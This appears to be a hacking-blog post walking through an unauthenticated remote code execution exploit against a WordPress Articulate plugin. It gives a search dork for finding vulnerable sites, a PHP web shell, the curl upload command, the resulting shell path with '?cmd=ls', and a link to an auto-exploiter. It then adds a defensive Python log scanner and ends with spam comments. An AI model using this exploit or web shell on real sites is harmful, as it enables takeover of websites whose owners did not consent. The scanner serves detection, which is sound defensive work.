WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (UNAUTHORIZED)

> REFERENCE : https://cxsecurity.com/issue/WLB-2019060137 (AUTH RCE)
> CX: https://cxsecurity.com/issue/WLB-2019060146
> DORK : inurl:/wp-content/plugins/insert-or-embed-articulate/ ( only that few? expand it yourself )
> PAYLOAD (the vulnerable REST endpoint): /index.php/wp-json/articulate/v1/upload-data
> Imagine I already have a target
LET'S TRY HAHA
OK, first check site.com/index.php/wp-json/articulate/v1/upload-data
EXAMPLE OF A VULNERABLE SITE: it answers with a message like this ;v
Now just build the request... since building it in Burp Suite is a hassle, I'll just use curl
LET'S EXPLOIT
> CREATE THE FILES index.html AND index.php
index.html :
<html>
Hello world
</html>

index.php :
<?php
// runs whatever is passed in ?cmd= on the server and returns its output
system($_GET['cmd']);
?>
> Once they're created, put them in a zip :D ( COMPRESS )
> LET'S UPLOAD
CURL :
curl site.com/index.php/wp-json/articulate/v1/upload-data -F "name={FILENAME}" -F "chunk={RANDOM}" -F "chunks={RANDOM}" -F "file=@YOURFILE.zip"
( -F makes curl send a multipart/form-data POST; name is the file name, chunk and chunks can be any number )
OK, here it says UPLOAD COMPLETE, which means it worked
Now try to open
site.com/PATH/ < PATH = the path from the result, e.g. site.com/wp-content/uploads/articulate_uploads/kntl17/index.php
( the plugin unpacks the zip under wp-content/uploads/articulate_uploads/, so the index.php inside it is served as PHP )
TO EXECUTE A COMMAND APPEND ?cmd=ls
BEHAHA 8) RCE SUCCESS

Auto exploiter tool:

https://pastebin.com/BEy5iDLA
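From the defender's side, the two traces this attack leaves in the web server log are a POST to the upload-data REST route and, shortly after, a request for a .php file under wp-content/uploads/articulate_uploads/. The scanner below is an added example, not from the post or the plugin: it runs over constructed Apache-style access log lines (made up for this example, not from any real server) and flags both. The assumption is that legitimate Articulate uploads also go through that REST route, so treat the upload label as something to review, while PHP being requested from the uploads tree is the strong signal, since the uploads directory should never hold executable PHP.

```python
#!/usr/bin/env python3
"""Added example: flag Articulate upload-data POSTs and PHP hits under
articulate_uploads in Apache-style access logs."""
import re
from urllib.parse import urlsplit

# Constructed sample log lines (not from a real server): an upload to the
# REST route, a hit on the dropped shell, then two benign requests.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2019:12:00:01 +0000] "POST /index.php/wp-json/articulate/v1/upload-data HTTP/1.1" 200 87 "-" "curl/7.64.0"
203.0.113.5 - - [10/Jun/2019:12:00:03 +0000] "GET /wp-content/uploads/articulate_uploads/kntl17/index.php?cmd=ls HTTP/1.1" 200 412 "-" "curl/7.64.0"
198.51.100.9 - - [10/Jun/2019:12:01:00 +0000] "GET /wp-content/uploads/articulate_uploads/course1/story.html HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jun/2019:12:01:05 +0000] "GET /wp-content/uploads/2019/06/logo.png HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

UPLOAD_ENDPOINT = "/wp-json/articulate/v1/upload-data"
UPLOAD_DIR = "/wp-content/uploads/articulate_uploads/"


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a finding label for one parsed request, or None if benign."""
    path = urlsplit(entry["target"]).path  # drop the ?cmd=... query string
    if entry["method"] == "POST" and path.endswith(UPLOAD_ENDPOINT):
        return "articulate_upload"        # review: legit uploads use it too
    if path.startswith(UPLOAD_DIR) and path.lower().endswith(".php"):
        return "php_under_uploads"        # strong signal: PHP served from uploads
    return None


def find_suspicious(log_text):
    """Scan a whole log and return (ip, label, target, status) per finding."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            findings.append((entry["ip"], label, entry["target"], entry["status"]))
    return findings


if __name__ == "__main__":
    for ip, label, target, status in find_suspicious(SAMPLE_LOG):
        print(f"{label:18} {ip:15} {status} {target}")
```

Pointing this at a real log (read the file instead of SAMPLE_LOG) gives you the source IP and the exact shell path to pull, and the ip grouping makes the upload-then-execute sequence stand out.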

- HAPPY HACKING GUYS -

- RINTOD

2 Responses to "WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (UNAUTHORIZED)"

  1. This is very educational content and written well for a change. It's nice to see that some people still understand how to write a quality post! clean wordpress site

  2. Yes, I totally agree with this article, and I just want to say that this article is very nice and very informative. I will make sure to be reading your blog more. You made a good point, but I can't help but wonder, what about the other side? !!!!!! Thanks wordpress virus remova
